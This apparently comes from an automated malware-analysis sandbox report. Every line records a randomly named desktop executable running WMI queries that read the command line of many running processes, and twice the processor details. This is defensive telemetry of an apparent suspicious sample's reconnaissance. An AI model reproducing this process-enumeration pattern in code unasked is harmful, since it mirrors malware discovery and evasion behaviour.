Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7924
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6820
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2508
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3800
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7908
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4224
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1636
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1204
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2064
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6804
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7232
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3352
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1692
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5072
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 760
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 8084
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7652
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 324
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 8512
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1612
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7992
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7836
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6348
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3460
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3760
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2132
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3756
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6772
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3852
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7632
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5476
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 8620
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6756
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2876
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6752
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6316
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7608
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5020
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6312
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5172
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2860
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2428
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6736
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 8028
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2852
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5436
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 656
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4140
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7768
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7144
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1980
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7300
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2408
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7148
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 8004
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1972
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6280
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6708
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2396
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1964
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6272
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4116
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7132
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1096
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 664
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7124
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1088
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4104
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6688
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7384
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7548
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1080
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7932
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1508
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3660
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 900
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7104
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7100
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 632
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6664
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7956
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 624
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7948
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3476
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2772
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5788
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7080
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7860
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 8868
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1472
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6864
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5780
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2760
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 8876
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7472
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1028
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7492
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7060
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7004
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1452
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6192
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1880
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7048
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6616
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6184
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7368
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4888
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5748
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1436
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5312
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 8884
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2292
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 992
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7884
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 556
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1416
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6156
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7448
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 8740
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 8308
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7012
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7248
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1832
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3984
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6624
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6136
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7428
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5696
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 92
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2672
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9136
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5256
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6548
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 8520
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7408
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1372
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6112
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3684
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2228
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 932
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7568
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3084
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 928
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 496
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1788
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 60
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6092
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 488
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7812
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2204
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6080
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4784
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5644
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2624
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7528
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6324
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6928
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7788
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6924
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2612
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 884
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2176
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1716
